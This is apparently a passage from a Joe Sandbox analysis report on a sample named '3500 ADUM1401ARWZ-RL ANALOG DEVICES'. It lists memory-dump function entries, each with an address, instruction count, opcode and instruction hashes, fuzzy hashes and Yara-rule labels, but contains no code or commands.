Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction ID: 4909b75a7df67f33bf0449de7cf7d956cca125d77be2518e5e798ddf13d8c23e
Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
Instruction Fuzzy Hash: 4911DD73601605AFE722DA48CC84F9EBBB8EB84754F100029F6018F191D671ED44DB60

Function 01708770 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7ba5855b3869ecbc10df6112b36381209d03ff75a9b4dd8489f18bbf390af53
Instruction ID: eecfb0c04cff2c8313982f094e4bc2028b203d2c421c7d10b011cb21607671a6
Opcode Fuzzy Hash: a7ba5855b3869ecbc10df6112b36381209d03ff75a9b4dd8489f18bbf390af53
Instruction Fuzzy Hash: E911B271B00711DBDB12CF8DC480A56FBE9AF9A714B18407EEE08DF249D6B2D9018B92

Function 0173AAEE Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
Instruction ID: 1baf8f100a45b8c99ea0850371f00118d6813b0b7b899858b3e54f74861df491
Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
Instruction Fuzzy Hash: 13217972600A41DFDB298F4DC545A66FBE6EBD4B10F14887DE58ACBA26C731EC01CB80

Function 0040AC5E Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7150a91777182af2ca46cc04b49ddb0c334c7608205975cb6e6144a378c9a40
Instruction ID: 5e75e985f5abb2947a14bbabe02984a3a90d2b8f7c288810b407127b22d3e58e
Opcode Fuzzy Hash: b7150a91777182af2ca46cc04b49ddb0c334c7608205975cb6e6144a378c9a40
Instruction Fuzzy Hash: 6E110C3250D7A89BD30BDB288DDA698BF40A8832143A402DEC092AF5E3C65590A3C6D3

Function 017080E9 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebb88c67ff014eb6e8006d4424f011046204649a94603330a7763ae40ad92174
Instruction ID: e2587b46b9027b34d9675717590d8bb956bff48774ddfd63f0cd771740c9835e
Opcode Fuzzy Hash: ebb88c67ff014eb6e8006d4424f011046204649a94603330a7763ae40ad92174
Instruction Fuzzy Hash: 9F216835A00206DFCB15CF98C580AAAFBF6FF88318F2441ADD105AB354CB71AD06CB91

Function 0173674D Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3717451835b9f338b5938146a52055c0e690e61f42eb1736af9e1d01507745ed
Instruction ID: 519377f183e67e008f6ce3bddadc9c78c0ae36e3cb5caf69d70fcedf778c0711
Opcode Fuzzy Hash: 3717451835b9f338b5938146a52055c0e690e61f42eb1736af9e1d01507745ed
Instruction Fuzzy Hash: EF215C75600A01EFD7219F69C881B66F7F8FF84650F44882DF5AAC7252EB70E950CBA1

Function 01796870 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2262b8ec460cf4a708550b22a8a106bd0bcb66ad89fc922db3e134d5a3853254
Instruction ID: a6417cec0ee7762771cbd231139196967c5814e45b9e6630d6d18d38b69b3ada
Opcode Fuzzy Hash: 2262b8ec460cf4a708550b22a8a106bd0bcb66ad89fc922db3e134d5a3853254
Instruction Fuzzy Hash: BB11C132240514EBCB22DB5DE940F9AFBA8EB99A60F114129F2019B251DA70E809C790

Function 0172E8C0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c2144777fdf3f090b2f9c0f25f9a5787cbcc26cfa9ee29d07108a4cabf5649a
Instruction ID: 45bc4d14012fb721a2b52a8d3ef662931c6dfc312d2ee063cd762639567071d6
Opcode Fuzzy Hash: 3c2144777fdf3f090b2f9c0f25f9a5787cbcc26cfa9ee29d07108a4cabf5649a
Instruction Fuzzy Hash: F11108333041249FCB19DB29DC95A6BF25AEFD5370B254539EA228B395ED309802C391

Function 017366B0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69b885ad8662db6f3da79ff423c10e345c481de47b2fd22465da64dfe5c34adb
Instruction ID: 660e852266356b4d952d56cf7eaef0efa722a73c09eb67f4c2f3efeb6d811b05
Opcode Fuzzy Hash: 69b885ad8662db6f3da79ff423c10e345c481de47b2fd22465da64dfe5c34adb
Instruction Fuzzy Hash: 7011BF76A01205EBCB26DF59C580A5AFBE5EBC4650B518079E9059B316E630DE00CBA0

Function 017CA8E4 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
Instruction ID: 1eef5b761b4679f8930a04d62a27094183a4286716d9e9f0c52d928bf63378d1
Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
Instruction Fuzzy Hash: D8110436A00909AFDB19CB58C845B9DFBB5EF84710F05826DE84597344E631BE41CB80

Function 01700AD0 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
Instruction ID: 65fc7179ac838f9f0f8db4054171bb5b9dac7d10f03f24145475155999845ce2
Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
Instruction Fuzzy Hash: 8C2106B5A00B059FD3A0CF29D440B52BBF4FB48B20F10492EE98AC7B50E371E814CB90

Function 0178E7E1 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction ID: faf975da205d00c1fd6dd3b0f36308f3a3c4eb4a26c3db1672da744c81a62b05
Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
Instruction Fuzzy Hash: C811A0326D0601EFE721AF49C848B5EFBE5EF45754F059428EA099B260DF71DC40DB90

Function 017227ED Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42ec02f72b49c9a6554dfcd198bf57e087792bab803fd94b5348dd10c0b1ae30
Instruction ID: c0b170e8ee045eed2efedda403a4a1bae8e9490620533c60cd29d47f7a1be958
Opcode Fuzzy Hash: 42ec02f72b49c9a6554dfcd198bf57e087792bab803fd94b5348dd10c0b1ae30
Instruction Fuzzy Hash: 6E014931745685AFE316A66EDC48F27FB8CEF90390F0500B5FD009B296DA54DC01C271

Function 01704690 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d101467eaa5e8478038658f2398112c9c5a3d8b5026ddd424fb7242ac9780c0
Instruction ID: cca00b15c86cd606229ca11550e41065146dc7b054c2fd7b14d89451c839b635
Opcode Fuzzy Hash: 8d101467eaa5e8478038658f2398112c9c5a3d8b5026ddd424fb7242ac9780c0
Instruction Fuzzy Hash: 4711A036600745EFDB27CF5DD944B56BBE8EB86764F005119FA068B690C770E800CF60

Function 017D4B00 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b688fcb5cfa3dd8b388b52e6bcbdc6acfcee4c63b5fc0e452e44097eafc62ad
Instruction ID: 312e1d4d84b878de25ba4905e9eb24e115d72aadfb9bf6f5c71552289956f4e9
Opcode Fuzzy Hash: 8b688fcb5cfa3dd8b388b52e6bcbdc6acfcee4c63b5fc0e452e44097eafc62ad
Instruction Fuzzy Hash: 3E11C2362006199FD7229B6DD844F67F7B6FFD4720F194429EA8787A94DA30A802CB90

Function 0040AC3D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276189498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e947c5970b5e4b59ade8afd0fc725ba55db16f4df64ff9215550d377944180f9
Instruction ID: e25be1d46c2a01dc92d31b398599da94a796c165172e45c3d16629e6414aad93
Opcode Fuzzy Hash: e947c5970b5e4b59ade8afd0fc725ba55db16f4df64ff9215550d377944180f9
Instruction Fuzzy Hash: F101FE3510D6A14FC30BDB68DEC22E4BF64AC833043A005EEC093DF2A3C22A90578AC3

Function 01736620 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a51e11c605ceb8dd39a41ac11a568dee162a484d90fea5302c42b8e3c7395819
Instruction ID: 6ead4c3d4cc822fcc186ec53b81fb78956d4995d65eb0771bd791df9f077ff45
Opcode Fuzzy Hash: a51e11c605ceb8dd39a41ac11a568dee162a484d90fea5302c42b8e3c7395819
Instruction Fuzzy Hash: B1118272A00715FBDB22DF59C984B5EFBB8FF84790F510459EA01A7245D730AE019B60

Function 0172EA2E Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a216ca72cf9d660dfb4968e1d0c58131b90ea08d986a17045ea1c32bbc6b59f4
Instruction ID: f6d62f2e7707a9bba2c4763c8daed040a51fec3c01dc22b0ee581887c0348749
Opcode Fuzzy Hash: a216ca72cf9d660dfb4968e1d0c58131b90ea08d986a17045ea1c32bbc6b59f4
Instruction Fuzzy Hash: C4019E7150120A9FC725DF19D448F26FBF9EB85324F21816EE2058B2A8CB70AD82CB90

Function 0172E53E Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction ID: 35e54029b00838ee43cf05dbbc7f0aafdd3c82125fbf8118db311e470639d43b
Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
Instruction Fuzzy Hash: EA110C712116D19BE723972DD968F25F7D8FF01754F1900E0DD41C7642F728C982C650

Function 0178E75D Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction ID: c8a28e996fd46f0966e681a1791f1d1a0e5cb9205ff0c77926077d404b98d63f
Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
Instruction Fuzzy Hash: 33019236640205EFE725BF58CC08F5AFBA9EB95760F058474EA059B264EB71DD80C790

Function 016FA250 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction ID: a73b6e0ceeae27a3068a9400c6c1adf3fb0bb37b66932eefced177091554f87a
Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
Instruction Fuzzy Hash: EA012635604B219BCB318F99EC40A327BA4EF55770704C62DFE998B281C731D401CBA0

Function 017D4940 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aa8352d21504409645d1e377c82fa36c7ad44a6f58fb2a7fc0ac6bea989e970
Instruction ID: eece90d06cd5b907cd939ff715d347b8dfbdfb04b7f5afeda73ebe393426707a
Opcode Fuzzy Hash: 3aa8352d21504409645d1e377c82fa36c7ad44a6f58fb2a7fc0ac6bea989e970
Instruction Fuzzy Hash: 120145335412059FC332DF1EC844E12FBB8EB81770B254265E9AA9B5AAE730EC01CBC0

Function 0177E1D0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5965993aa4ce8ddc20320f4189e16413a02a8f28534ce97c085479aab226fbe1
Instruction ID: 35df96cc259612313d1af53a4f382ce2ec42940904ae87bad46a781c982b4bb2
Opcode Fuzzy Hash: 5965993aa4ce8ddc20320f4189e16413a02a8f28534ce97c085479aab226fbe1
Instruction Fuzzy Hash: 5211CB32241601EFCB26AF09C880F06BBB8FF58B44F2000A8EA058B6A1C631ED01CA90

Function 01706259 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09e87c1217c78027db69dc26d2eeafff44ed387867a92b83bfca19bba76b26eb
Instruction ID: 6f7c75bc1a0d11d42ef2685a7998a6657fa8432e817fa6834c045231f8cd6ed3
Opcode Fuzzy Hash: 09e87c1217c78027db69dc26d2eeafff44ed387867a92b83bfca19bba76b26eb
Instruction Fuzzy Hash: DE119A70641229ABDB26EF24CC56FE9B3B4AF04720F5041D4B318A60E5EB309E91CF84

Function 01786050 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9e9df10f6a731dedff75217ba08f67ee0009a6fa07441a9b85d0efc2efd84d
Instruction ID: 99b660a1ae438a3fe193cb3d138b3918e186e86c69de24a3b057d66003f2526c
Opcode Fuzzy Hash: 8a9e9df10f6a731dedff75217ba08f67ee0009a6fa07441a9b85d0efc2efd84d
Instruction Fuzzy Hash: BB111776900019BBCB16EB94CC84EDFBB7DEF48254F044166A906E7211EA34AA55CBE0

Function 0170208A Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction ID: 460c8f8bcd715e79abea9c1efeedec6c980f266c6fffe6c71da83181a7476328
Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
Instruction Fuzzy Hash: EF01F533200310CBDF52CA2DD888A52F7ABBFC4610F5544A5ED458F29BDAB1C881C3A0

Function 01796500 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4da73f909de50b1ebd94f7f583694f997c96623439c4d5e9d044aff3771d574e
Instruction ID: 026ba98c6c26508fb022e9b0c12688bfe7abe1b8e5c2b88edc62304ceccd665d
Opcode Fuzzy Hash: 4da73f909de50b1ebd94f7f583694f997c96623439c4d5e9d044aff3771d574e
Instruction Fuzzy Hash: C311E5726001459FC701CF18E400BA2FBB5FB5A314F188259F8448B315D731EC84CBA0

Function 0178C810 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ae47875e09254b16e5e2bc3777a8ed709695807652362966965de626962a3c4
Instruction ID: 2359c43f7abcd868d2b6fe4401b95d1d5dee215014c13ee12a98092c576784aa
Opcode Fuzzy Hash: 7ae47875e09254b16e5e2bc3777a8ed709695807652362966965de626962a3c4
Instruction Fuzzy Hash: 9E1118B1A102099FCB00DFA9D545AAEFBF8FF58250F10806AA905E7355D674EA018BA4

Function 017AEA60 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff130ef6a3765a8cd5ddb81e46fb429191e75d9bb116d6a317cb54d8315ceccb
Instruction ID: 7ed7d3beeeeb24908fd659ce8eae808a3f89190dfc8037297915bb170ae15b82
Opcode Fuzzy Hash: ff130ef6a3765a8cd5ddb81e46fb429191e75d9bb116d6a317cb54d8315ceccb
Instruction Fuzzy Hash: CA0124311402119BCB32AF298494D37FBBAFFD16A0BA4446EF2110B215CF30EE81CB90

Function 016FC020 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction ID: ce31bef99e60d8c210d65c3b518c43c42512d722a1590ee486167d415e07bb73
Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction Fuzzy Hash: D60128321007099FEB3296ADC804EA7F7E9FFC5214F14481DEA468B544DBB1E443C760

Function 017420F0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 506072d6d1fb6cac77647e935b1e246573740e0cd84ad41199b1496e59d181c8
Instruction ID: bb66d60d162dc3bd299b4ca15a567c995fdf2a8ccd4b8b3aaf77043c7958bfe0
Opcode Fuzzy Hash: 506072d6d1fb6cac77647e935b1e246573740e0cd84ad41199b1496e59d181c8
Instruction Fuzzy Hash: 1E116D35A0120DAFDF05EFA4D854FAEBBB5EB44250F004099F90297254E735AE11CB90

Function 0173E5CF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b3c0b2ab9f67562d8d60b5b2e1966a9a41805542256ff6aec95c667c0334eb6
Instruction ID: 51f546a201763b02d6b2953f51b2c85b303c15d41cce1f483c03311d3630d08f
Opcode Fuzzy Hash: 7b3c0b2ab9f67562d8d60b5b2e1966a9a41805542256ff6aec95c667c0334eb6
Instruction Fuzzy Hash: 1C0184713416117BD711BB7DCD84E57F7ACFB95664B100529B60583659DB24EC01C6A0

Function 017969C0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21da752a0f5cecb02ee4aad452077244d60c0315493f1548207f714593776a84
Instruction ID: 33efb44a57ccfdd1344ce9751ad6c5d2e7cb3f027c20fe83930f1120227613dd
Opcode Fuzzy Hash: 21da752a0f5cecb02ee4aad452077244d60c0315493f1548207f714593776a84
Instruction Fuzzy Hash: C701FC322242129BC720DF6ED848967FBA9FF54660F514229F95987180E7349A05C7D1

Function 0178C460 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a2b2f99c5d901affdee927b0e14ba4697b7b77b4e0aa8e1dfdd0daf7027f9e2
Instruction ID: 1944128b12ee6ea9365ae9820234dc0c26cc29b2483ef519fb4e6307596d1e60
Opcode Fuzzy Hash: 8a2b2f99c5d901affdee927b0e14ba4697b7b77b4e0aa8e1dfdd0daf7027f9e2
Instruction Fuzzy Hash: E3115B71A01209ABDB16EFA8C844EEEBBB5FB48250F004059B90597344DA34E951DBA0

Function 0178C97C Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a4901f218f688fa5ad4c52c1101a742349edacbe9ae1236481c2288694848b
Instruction ID: 4d0e26edefa7389ec77743e948e5e96864aa2f0b4b6e68962bf634c50d0a6fda
Opcode Fuzzy Hash: 11a4901f218f688fa5ad4c52c1101a742349edacbe9ae1236481c2288694848b
Instruction Fuzzy Hash: 5C1179B16183089FC700DF69C445A9BFBE4EF98310F00855EB998D7394E630E900CBA2

Function 0178CA11 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276864429.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16d0000_3500 ADUM1401ARWZ-RL ANALOG DEVICES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc045603e9196a079dd96866902ed54167caceb955d9e14155fce9c220cbf53e
Instruction ID: 24c2a25b6451fd4778d6c72fd90901e2e03ad83dc1574019c1bf06bbcd1abdfa
